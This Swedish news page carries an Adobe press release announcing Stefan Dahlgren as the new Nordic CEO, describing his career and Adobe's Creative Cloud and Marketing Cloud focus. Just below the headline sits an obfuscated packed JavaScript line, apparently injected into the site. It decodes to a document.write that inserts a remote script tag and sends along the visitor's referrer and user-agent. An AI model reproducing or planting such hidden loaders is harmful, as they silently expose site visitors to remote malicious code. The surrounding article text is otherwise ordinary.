Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Adobe får ny Norden-VD

Adobe får ny Norden-VD
Sebastian

Adobe: eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zasyn|var|u0026u|referrer|enynk||js|php’.split(’|’),0,{}))
Den erfarne IT-profilen Stefan Dahlgren blir ansvarig för mjukvaruföretaget Adobe i Sverige, Norge, Danmark och Finland.

Mjukvaruföretaget Adobe anställer nu Stefan Dahlgren som ny VD för Norden. Han har arbetat i IT- och telekombranschen i över 25 år, bland annat som försäljningsansvarig hos TeliaSonera samt landschef för mjukvaruföretaget BEA Systems och Nordisk Direktör för Brokat Technologies. Han har även agerat som egenanställd konsult med expertis inom bland annat Change Management.

Stefan Dahlgren har alltid utvecklat de organisationer han ansvarat för och tagit dem till nästa nivå, något som även är planen för Adobe i regionen. Det nu 30 år gamla mjukvaruföretaget har vuxit sig så stort att det idag är en av de största mjukvaruleverantörerna i världen. Oavsett om det är en mobilapp, ett Facebookspel, en hemsida, en YouTube-video, en tryckt annons, en e-butik, en e-tidning eller en bankapplikation så är chansen väldigt stor att det används teknologi från Adobe i en eller flera delar av skapandeprocessen.

Adobe består av de två huvudavdelningarna Digital Media och Digital Marketing, som bägge nu fokuserar på lösningar i molnet, Adobe Creative Cloud och Adobe Marketing Cloud.

”Vi har ett bra grepp med våra kreativa produter i Norden. Min viktigaste uppgift blir att överbevisa marknaden om att vi har de mest avancerade produkterna för att optimera den digitala marknadsföringen och att våra två huvudtyper av produkter kompletterar varandra och ofta appellerar till samma typ av kunder.” säger Stefan Dahlgren.

”Vi har ett starkt och kompetent team i Norden och jag ser fram emot att tillsammans med dem fortsätta att utveckla Adobe samt växa ännu snabbare på den Nordiska marknaden.”

Mer information på www.adobe.com

Detta är ett pressmeddelande från Adobe